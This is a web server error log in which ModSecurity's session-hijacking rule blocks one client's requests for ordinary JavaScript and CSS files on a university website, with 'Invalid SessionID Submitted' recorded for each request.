[Mon Aug 28 06:51:31.018889 2023] [:error] [pid 37421] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery.mousewheel-3.0.4.pack.js"] [unique_id "ZOvhg8Co-f0AAJIt8pIAAAAW"]
[Mon Aug 28 06:51:31.026460 2023] [:error] [pid 37416] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/Sansation_300-Sansation_700.font.js"] [unique_id "ZOvhg8Co-f0AAJIoaHwAAAAR"]
[Mon Aug 28 06:51:31.036743 2023] [:error] [pid 37312] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/AC_RunActiveContent.js"] [unique_id "ZOvhg8Co-f0AAJHAkCUAAAAY"]
[Mon Aug 28 06:51:31.046459 2023] [:error] [pid 37407] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery.fancybox.settings.js"] [unique_id "ZOvhg8Co-f0AAJIfRJcAAAAN"]
[Mon Aug 28 06:51:31.067505 2023] [:error] [pid 37465] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/ddsmoothmenu.js"] [unique_id "ZOvhg8Co-f0AAJJZZk4AAAAE"]
[Mon Aug 28 06:51:31.095921 2023] [:error] [pid 37451] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/ddsmoothmenu.settings.js"] [unique_id "ZOvhg8Co-f0AAJJLpjQAAAAA"]
[Mon Aug 28 06:51:31.115878 2023] [:error] [pid 37407] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery.nivo.slider.settings.js"] [unique_id "ZOvhg8Co-f0AAJIfRJgAAAAN"]
[Mon Aug 28 06:51:31.121334 2023] [:error] [pid 37418] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery.nivo.slider.pack.js"] [unique_id "ZOvhg8Co-f0AAJIqOHIAAAAT"]
[Mon Aug 28 06:51:31.138429 2023] [:error] [pid 37420] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/aslider.js"] [unique_id "ZOvhg8Co-f0AAJIsP3wAAAAV"]
[Mon Aug 28 06:51:31.152090 2023] [:error] [pid 37312] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/slidingboxes.js"] [unique_id "ZOvhg8Co-f0AAJHAkCYAAAAY"]
[Mon Aug 28 06:51:31.181193 2023] [:error] [pid 37421] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/styleswitch.js"] [unique_id "ZOvhg8Co-f0AAJIt8pMAAAAW"]
[Mon Aug 28 06:51:31.237582 2023] [:error] [pid 37313] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/resources/css/ext-all.css"] [unique_id "ZOvhg8Co-f0AAJHB36YAAAAD"]
[Mon Aug 28 06:51:31.246743 2023] [:error] [pid 37465] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/resources/css/xtheme-gray.css"] [unique_id "ZOvhg8Co-f0AAJJZZk8AAAAE"]
[Mon Aug 28 06:51:31.256259 2023] [:error] [pid 37416] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext_plugins/statusbar/css/statusbar.css"] [unique_id "ZOvhg8Co-f0AAJIoaH4AAAAR"]
[Mon Aug 28 06:51:31.282828 2023] [:error] [pid 37407] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/css/Spinner.css"] [unique_id "ZOvhg8Co-f0AAJIfRJkAAAAN"]
[Mon Aug 28 06:51:31.300834 2023] [:error] [pid 37312] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/fileuploadfield.css"] [unique_id "ZOvhg8Co-f0AAJHAkCcAAAAY"]
[Mon Aug 28 06:51:31.328261 2023] [:error] [pid 37313] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/data-view.css"] [unique_id "ZOvhg8Co-f0AAJHB36cAAAAD"]
[Mon Aug 28 06:51:31.336235 2023] [:error] [pid 37421] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/examples.css"] [unique_id "ZOvhg8Co-f0AAJIt8pQAAAAW"]
[Mon Aug 28 06:51:31.357557 2023] [:error] [pid 37420] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/icons/silk.css"] [unique_id "ZOvhg8Co-f0AAJIsP30AAAAV"]
[Mon Aug 28 06:51:31.371468 2023] [:error] [pid 37312] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/tabs.css"] [unique_id "ZOvhg8Co-f0AAJHAkCgAAAAY"]
[Mon Aug 28 06:51:31.382793 2023] [:error] [pid 37407] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/treegrid/treegrid.css"] [unique_id "ZOvhg8Co-f0AAJIfRJoAAAAN"]
[Mon Aug 28 06:51:31.387778 2023] [:error] [pid 37313] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ext-all.js"] [unique_id "ZOvhg8Co-f0AAJHB36gAAAAD"]
[Mon Aug 28 06:51:31.417412 2023] [:error] [pid 37465] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/application/frontend/store/DataMasterPublic.js"] [unique_id "ZOvhg8Co-f0AAJJZZlAAAAAE"]
[Mon Aug 28 06:51:31.447307 2023] [:error] [pid 37416] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/application/frontend/pendaftaran/verifikasipmb_form.js"] [unique_id "ZOvhg8Co-f0AAJIoaH8AAAAR"]
[Mon Aug 28 06:51:31.456503 2023] [:error] [pid 37407] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/application/frontend/find_m.js"] [unique_id "ZOvhg8Co-f0AAJIfRJsAAAAN"]
[Mon Aug 28 06:51:31.467342 2023] [:error] [pid 37418] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/Ext.ux.grid.Search.js"] [unique_id "ZOvhg8Co-f0AAJIqOHQAAAAT"]
[Mon Aug 28 06:51:31.486397 2023] [:error] [pid 37420] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/form/NumberField.js"] [unique_id "ZOvhg8Co-f0AAJIsP34AAAAV"]
[Mon Aug 28 06:51:31.491957 2023] [:error] [pid 37451] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/application/frontend/website/ftracerstudy.js"] [unique_id "ZOvhg8Co-f0AAJJLpjcAAAAA"]
[Mon Aug 28 06:51:31.517682 2023] [:error] [pid 37465] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery.fancybox-1.3.4.js"] [unique_id "ZOvhg8Co-f0AAJJZZlEAAAAE"]
[Mon Aug 28 06:51:31.562742 2023] [:error] [pid 37421] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery.mousewheel-3.0.4.pack.js"] [unique_id "ZOvhg8Co-f0AAJIt8pUAAAAW"]
[Mon Aug 28 06:51:31.581016 2023] [:error] [pid 37312] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/cufon-yui.js"] [unique_id "ZOvhg8Co-f0AAJHAkCkAAAAY"]
[Mon Aug 28 06:51:31.592795 2023] [:error] [pid 37401] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/supersleight.plugin.js"] [unique_id "ZOvhg8Co-f0AAJIZRogAAAAF"]
[Mon Aug 28 06:51:31.667056 2023] [:error] [pid 37416] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/adapter/ext/ext-base.js"] [unique_id "ZOvhg8Co-f0AAJIoaIAAAAAR"]
[Mon Aug 28 06:51:31.707033 2023] [:error] [pid 37421] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery.fancybox-1.3.4.js"] [unique_id "ZOvhg8Co-f0AAJIt8pYAAAAW"]
[Mon Aug 28 06:51:31.776090 2023] [:error] [pid 37416] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/menu.css"] [unique_id "ZOvhg8Co-f0AAJIoaIEAAAAR"]
[Mon Aug 28 06:51:31.813118 2023] [:error] [pid 37465] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery.fancybox.settings.js"] [unique_id "ZOvhg8Co-f0AAJJZZlMAAAAE"]
[Mon Aug 28 06:51:31.837096 2023] [:error] [pid 37421] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/dark.css"] [unique_id "ZOvhg8Co-f0AAJIt8pcAAAAW"]
[Mon Aug 28 06:51:31.906925 2023] [:error] [pid 37421] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/cufon-yui.js"] [unique_id "ZOvhg8Co-f0AAJIt8pgAAAAW"]
[Mon Aug 28 06:51:31.921378 2023] [:error] [pid 37451] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/blue.css"] [unique_id "ZOvhg8Co-f0AAJJLpjkAAAAA"]
[Mon Aug 28 06:51:32.027019 2023] [:error] [pid 37421] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/green.css"] [unique_id "ZOvhhMCo-f0AAJIt8pkAAAAW"]
[Mon Aug 28 06:51:32.031068 2023] [:error] [pid 37416] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/Sansation_300-Sansation_700.font.js"] [unique_id "ZOvhhMCo-f0AAJIoaIMAAAAR"]
[Mon Aug 28 06:51:32.126321 2023] [:error] [pid 37312] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/bg.css"] [unique_id "ZOvhhMCo-f0AAJHAkCsAAAAY"]
[Mon Aug 28 06:51:32.128987 2023] [:error] [pid 37313] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/style100.css"] [unique_id "ZOvhhMCo-f0AAJHB36oAAAAD"]
[Mon Aug 28 06:51:32.163677 2023] [:error] [pid 37421] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/ddsmoothmenu.js"] [unique_id "ZOvhhMCo-f0AAJIt8poAAAAW"]
[Mon Aug 28 06:51:32.232796 2023] [:error] [pid 37312] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/dark100.css"] [unique_id "ZOvhhMCo-f0AAJHAkCwAAAAY"]
[Mon Aug 28 06:51:32.246194 2023] [:error] [pid 37420] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/blue100.css"] [unique_id "ZOvhhMCo-f0AAJIsP4EAAAAV"]
[Mon Aug 28 06:51:32.292044 2023] [:error] [pid 37421] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/ddsmoothmenu.settings.js"] [unique_id "ZOvhhMCo-f0AAJIt8psAAAAW"]
[Mon Aug 28 06:51:32.334852 2023] [:error] [pid 37416] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/green100.css"] [unique_id "ZOvhhMCo-f0AAJIoaIQAAAAR"]
[Mon Aug 28 06:51:32.407471 2023] [:error] [pid 37420] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/bg100.css"] [unique_id "ZOvhhMCo-f0AAJIsP4IAAAAV"]
[Mon Aug 28 06:51:32.421839 2023] [:error] [pid 37465] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery.nivo.slider.pack.js"] [unique_id "ZOvhhMCo-f0AAJJZZlYAAAAE"]
[Mon Aug 28 06:51:32.533044 2023] [:error] [pid 37407] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery.nivo.slider.settings.js"] [unique_id "ZOvhhMCo-f0AAJIfRKEAAAAN"]
[Mon Aug 28 06:51:32.617378 2023] [:error] [pid 37312] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/aslider.js"] [unique_id "ZOvhhMCo-f0AAJHAkC4AAAAY"]
[Mon Aug 28 06:51:32.731580 2023] [:error] [pid 37313] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/slidingboxes.js"] [unique_id "ZOvhhMCo-f0AAJHB360AAAAD"]
[Mon Aug 28 06:51:32.877141 2023] [:error] [pid 37313] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/supersleight.plugin.js"] [unique_id "ZOvhhMCo-f0AAJHB364AAAAD"]
[Mon Aug 28 06:51:33.026254 2023] [:error] [pid 37313] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/styleswitch.js"] [unique_id "ZOvhhcCo-f0AAJHB368AAAAD"]
[Mon Aug 28 06:51:33.166175 2023] [:error] [pid 37313] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/fileuploadfield.css"] [unique_id "ZOvhhcCo-f0AAJHB37AAAAAD"]
[Mon Aug 28 06:51:33.187660 2023] [:error] [pid 37401] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/resources/css/ext-all.css"] [unique_id "ZOvhhcCo-f0AAJIZRosAAAAF"]
[Mon Aug 28 06:51:33.198730 2023] [:error] [pid 37451] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/resources/css/xtheme-gray.css"] [unique_id "ZOvhhcCo-f0AAJJLpjsAAAAA"]
[Mon Aug 28 06:51:33.198904 2023] [:error] [pid 37421] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/css/Spinner.css"] [unique_id "ZOvhhcCo-f0AAJIt8p8AAAAW"]
[Mon Aug 28 06:51:33.208128 2023] [:error] [pid 37407] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext_plugins/statusbar/css/statusbar.css"] [unique_id "ZOvhhcCo-f0AAJIfRKMAAAAN"]
[Mon Aug 28 06:51:33.227886 2023] [:error] [pid 37465] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/data-view.css"] [unique_id "ZOvhhcCo-f0AAJJZZlgAAAAE"]
